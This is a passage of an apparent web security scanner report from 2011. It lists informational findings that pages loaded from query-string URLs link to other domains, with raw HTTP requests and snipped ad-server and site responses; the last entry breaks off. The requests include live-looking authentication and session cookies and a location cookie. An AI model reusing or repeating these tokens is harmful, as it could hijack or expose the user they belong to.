GET /adj/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=301;tile=8;sz=336x280,300x250,300x100;ord=544787951046600960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 01:30:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 343

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/0/0/%2a/k;239324480;0-0;1;37579671;4307-300/250;41455288/41473075/1;;~sscs=%3fhttp://www.nuol.edu/degrees-information-assurance.asp"><img src="http://s0.2mdn.net/viewad/2328018/northeastern_300x250_MSIA.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.8. http://allatsea.net/directclassifieds.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /directclassifieds.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /directclassifieds.php?menuCategories=8 HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/subscribe.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1797107816-1304734004419; __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.5.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:13:31 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 19526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<div class="sidebarBuffer">
       <a href="http://www.twitter.com/allatseacarib"><img src="http://twitter-badges.s3.amazonaws.com/t_logo-a.png" alt="Follow allatseacarib on Twitter" class="sidebarSocial"/></a>
       <a href="http://www.facebook.com/pages/All-At-Sea-The-Caribbeans-Waterfront-Magazine/10150138295065416?ref=ts&amp;v=wall"><img src="/assets/social/find_us_on_facebook.png" alt="Follow All At Sea on Facebook" width="144" height="44" longdesc="http://www.facebook.com/pages/All-At-Sea-The-Caribbeans-Waterfront-Magazine/10150
...[SNIP]...
</a>
<a href="http://www.google.com/profiles/allatseacarib"><a href="http://www.google.com/profiles/allatseacarib"><img src="assets/social/buzz_logo.jpg" width="70" height="37" alt="All At Sea Google Buzz" longdesc="http://www.google.com/profiles/allatseacarib" class="sidebarSocial"/>
...[SNIP]...
<div class="sidebarBuffer">
<iframe src=
"http://www.facebook.com/plugins/activity.php?site=www.allatsea.net&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:300px; height:300px"></iframe>
...[SNIP]...
<div class="sidebarBuffer">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<div style="font-size:8px; padding-left:10px"><a href="http://www.facebook.com/pages/All-At-Sea-The-Caribbeans-Waterfront-Magazine/10150138295065416">All At Sea - The Caribbean&#039;s Waterfront Magazine</a>
...[SNIP]...
<!-- Include the Google Friend Connect javascript library. -->
<script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script>
...[SNIP]...
</h1>
<a href="http://www.firstmateonline.com/searchbycategory.php">By Category</a>
| <a href="http://www.firstmateonline.com/searchbyisland.php">By Location</a>
| <a href="http://www.firstmateonline.com/selectletter.php">By Alphabetical Order</a>
...[SNIP]...
<li><a href="http://www.firstmateonline.com/" id="logo-firstmateonline">&nbsp;</a>
...[SNIP]...
<li><a href="http://www.yachtessentials.com/" id="logo-yachtessentials">&nbsp;</a>
...[SNIP]...
<li><a href="http://www.forcrew.com/" id="logo-forcrew">&nbsp;</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-77adMomsUbcsc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
24.9. http://apps.sapha.com/appshandler.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /appshandler.php?ac=1&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/x-javascript
Content-Length: 26942

var lastpageview_ID='110075';var lastvisit_ID='2676569';var lastvisitor_ID='2668748';var lastvisit_datetime='2011-05-06 16:05:33';if(typeof(SCS)=="undefined"){SCS={}}SCS.DOMUtilities=function(){this.a
...[SNIP]...
prop in P){if(prop=="version"){Q.codebase=L+"download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version="+P.version}Q[prop]=P[prop]}}else{return'This content requires the Adobe Flash Player. <a href="http://www.adobe.com/go/getflash/" target="_blank">Get Flash</a>
...[SNIP]...
24.10. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=120511&u=&a=5&id=468990195&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/148848792/direct;;wi.160;hi.600/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMD2=AAEoyE2yFpUAAda-AAM1SAEBAAABSX1NshatAAHWvwADMMABAQAAAT5wTbIThAAB1r8AA1CpAQEAAAE8qE2yE6cAAda-AALpswEBAAABTh1NshOxAAHWvwADSxMBAQAAATk1TbH5FgAB1r8AAwS1AQEA; CMD3=AAFJfU2yGXEAAda-AAMwuwEBAAABUcZNshvmAAHWvwADXUQBAQAAAT5wTbITvQAB1r8AA1CnAQEAAAFOHU2yFpUAAda-AANLEQEBAAABPwRNshasAAHWvwAC90IBAQAAAU2CTbIZ7wAB1r8AA0r8AwMAAAFML02x+RYAAda-AAM-FgEBAA**; CMJ2=AAJzHU2y+SIB; CMS=98198&1304076182; CMD1=AAFMcU26n5YAAX+WAANDjAEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Fri, 06 May 2011 20:28:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 06 May 2011 20:28:10 GMT
Content-Length: 179
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Sat, 05 May 2012 20:28:10 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Thu, 04 Aug 2011 20:28:10 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Thu, 04 Aug 2011 20:28:10 GMT
Set-Cookie: CMSC=TcRZ2g**;domain=casalemedia.com;path=/;
Set-Cookie: CMD3=AAFJfU3EWdoAAda-AAMwuwECAAABPnBNxFnaAAHWvwADUKcBAgA*;domain=casalemedia.com;path=/;expires=Sun, 05 Jun 2011 20:28:10 GMT

document.write('<iframe src="http://cdn.optmd.com/V2/81520/217255/index.html" width="160" height="600" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');
24.11. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN3&AP=1090 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; FC05=FB=AgEAtw4P67gB; FC01=FB=AgEAuQ5ZB8gB; FC06=FB=AgEAvQ6Q8uwB; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC08=FB=AgEAvw4O/vgB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MSNRPSAuth=FAASARTFnW1j7R/2XIZB3mHe3d77E4hN8gNmAAAEgAAACBXYMoVREhyX0ADLEJLRiPILXfTnhyCvz9Go%2BL7ambo5dBf6RPTXNt11NoFy1AJuaoT0T2TxOAfGJcKG/wWHoMkWH3wqP/QN4jo1m7%2BNAdM3RHhQe8kiYltNKWPKkGejQZdl3uqmHRAAJQRYkMgp%2Bk0igKH1uU7%2BaR1w286L%2BYfi4CaaklOll/V2B7ivbPIflLPVJp/6vrubl9M4NrNx0QrX2G/gGs2ld4fHZkFuMyfd4%2BjMWtYCICZPYlmSFBwzjujFs8NWYS3WQmeL0gTh5CIQsx9kx17vsdPAFADz38T8NSgH2c2NxW8mM2p59qrjpw%3D%3D; MSNRPSShare=1; MSPAuth=9ZS6z9CnTHW6nQVLn69F5g6Kq1ZGc3ZrwOlg*roxIBmxDiYnXGxD!lZbQ3NaDTBICmclo916XIZmzbCt239s9!ofrljHmXARncTrTBhSXE5HYpO4CvzewYRcgboqrT6F63; MSPProf=9ng3Qj0dWDBgjckYbAydF4TeuPZIEqjRUAIQsjQC8bD7wSE7YcBkffxuAYa*5hFyfmsZw0z5iSAqmoJrRbBKbwEfaqa8N2YTDV8M*Hh!5oVibmYhBosajfilIcF947gI11Ahkt99*Z2rSzijfj!a0ur7*saIB9TO0cdTX34uzM5!JKmnlQDSL8Hw$$; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=TyTLJiYHPCovH3I7fPvWG8WWgxnFbQpamGFpO0Bcx8odiqKu6YYGUQ&W=1; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2406
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7932771-T37389090-C65000000000015128
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:06 GMT
Content-Length: 2406


//<![CDATA[
function getRADIds() { return{"adid":"65000000000015128","pid":"7932771","targetid":"37389090"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 160, 600);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_690569963() {var adCode_690569963=new Array();adCode_690569963.push('<iframe src="http://view.atdmt.com/APM/iview/148848792/direct;;wi.160;hi.600/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">\n');adCode_690569963.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_690569963.push('document.write(\'<a href="http://clk.atdmt.com/APM/go/148848792/direct;;wi.160;hi.600/01/" target="_blank"><img src="http://view.atdmt.com/APM/view/148848792/direct;;wi.160;hi.600/01/"/></a>
...[SNIP]...
24.12. http://dinclinx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?s=103&e=0&t=21&f=javascript HTTP/1.1
Host: dinclinx.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:49:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 7867

document.write('<table cellspacing="0" style="background-color: #ffffff; border: 1px solid #CBCBCB; border-collapse: collapse;"> <tr> <td height="19" colspan="2" style="font:bold 13px Arial,He
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=12024&amp;cmp=2972&amp;crv=10616&amp;pos=1&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Three ways to Prevent USB Insecurity in Your Enterprise: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=12024&amp;cmp=2972&amp;crv=10616&amp;pos=1&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/529_Lumension_logo.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=13008&amp;cmp=3215&amp;crv=11611&amp;pos=2&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Local Administrator Rights Discovery Tool: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=13008&amp;cmp=3215&amp;crv=11611&amp;pos=2&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/2/2437_Viewfinity_Logo-150x50.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=13165&amp;cmp=3254&amp;crv=11768&amp;pos=3&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Simplifying DNSSEC with Secure64 DNS Signer: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=13165&amp;cmp=3254&amp;crv=11768&amp;pos=3&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/3/3189_HP_S64_Logo.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=10228&amp;cmp=2529&amp;crv=8811&amp;pos=4&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Messaging Architecture Review eBook: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=10228&amp;cmp=2529&amp;crv=8811&amp;pos=4&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/2/2429_Sendmail_Logo.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=12590&amp;cmp=3116&amp;crv=11193&amp;pos=5&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Secure by Design: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110506T214955&amp;ast=12590&amp;cmp=3116&amp;crv=11193&amp;pos=5&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/3/3080_IBM_LOGO.jpg"></a>
...[SNIP]...
<td style="font: italic 11px Arial,Helvetica,sans-serif; color: #003366; text-align: Right; padding: 0.2em;" colspan="2"> <a href="http://whitepapers.SCMagazineUS.com/index.php?srcid=1190" style="font: italic 11px Verdana,Arial,Helvetica,sans-serif; color: #638090;"> View More Research </a>
...[SNIP]...
24.13. http://dinclinx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?s=103&e=0&t=21&f=javascript HTTP/1.1
Host: dinclinx.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 May 2011 01:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sat, 07 May 2011 01:30:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 7902

document.write('<table cellspacing="0" style="background-color: #ffffff; border: 1px solid #CBCBCB; border-collapse: collapse;"> <tr> <td height="19" colspan="2" style="font:bold 13px Arial,He
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=12024&amp;cmp=2972&amp;crv=10616&amp;pos=1&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Three ways to Prevent USB Insecurity in Your Enterprise: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=12024&amp;cmp=2972&amp;crv=10616&amp;pos=1&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/529_Lumension_logo.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=13008&amp;cmp=3215&amp;crv=11611&amp;pos=2&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Local Administrator Rights Discovery Tool: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=13008&amp;cmp=3215&amp;crv=11611&amp;pos=2&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/2/2437_Viewfinity_Logo-150x50.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=13165&amp;cmp=3254&amp;crv=11768&amp;pos=3&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> Simplifying DNSSEC with Secure64 DNS Signer: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=13165&amp;cmp=3254&amp;crv=11768&amp;pos=3&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/3/3189_HP_S64_Logo.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=12095&amp;cmp=2989&amp;crv=10687&amp;pos=4&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> The Growing Threat of Application-Layer DDoS Attacks: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=12095&amp;cmp=2989&amp;crv=10687&amp;pos=4&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/2/2931_Arbor_Logo.jpg"></a>
...[SNIP]...
<p style="font-size:8.5pt;font-family:Verdana; padding-top:5px"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=9075&amp;cmp=2100&amp;crv=7640&amp;pos=5&amp;frm=235" style="font: bold 11px Arial,Helvetica,sans-serif; text-decoration: none; color: #0070ac; font-size:9.0pt; " " onmouseover="this.style.textDecoration = \'underline\';this.style.color = \'#7e939e\';" onmouseout="this.style.textDecoration = \'none\';this.style.color = \'#0070ac\';"> TRITONT Securing the Borderless Enterprise: </a>
...[SNIP]...
<td style="width:80px; padding:10px 0px 0px 0px; border-bottom:1px dotted #cccccc;"> <a href="http://clk.madisonlogic.com/clk?pub=18&amp;pgr=10&amp;src=103&amp;ctg=15&amp;tgt=21&amp;tstamp=20110507T013031&amp;ast=9075&amp;cmp=2100&amp;crv=7640&amp;pos=5&amp;frm=235" target="_blank" style="text-decoration: none;text-align: right"><font face="Verdana"><img border="0" width="80" src="http://st.madisonlogic.com/images/userlogo/websenseLogo.jpg"></a>
...[SNIP]...
<td style="font: italic 11px Arial,Helvetica,sans-serif; color: #003366; text-align: Right; padding: 0.2em;" colspan="2"> <a href="http://whitepapers.SCMagazineUS.com/index.php?srcid=1190" style="font: italic 11px Verdana,Arial,Helvetica,sans-serif; color: #638090;"> View More Research </a>
...[SNIP]...
24.14. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /subscribe.php?event_id=82 HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/events.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
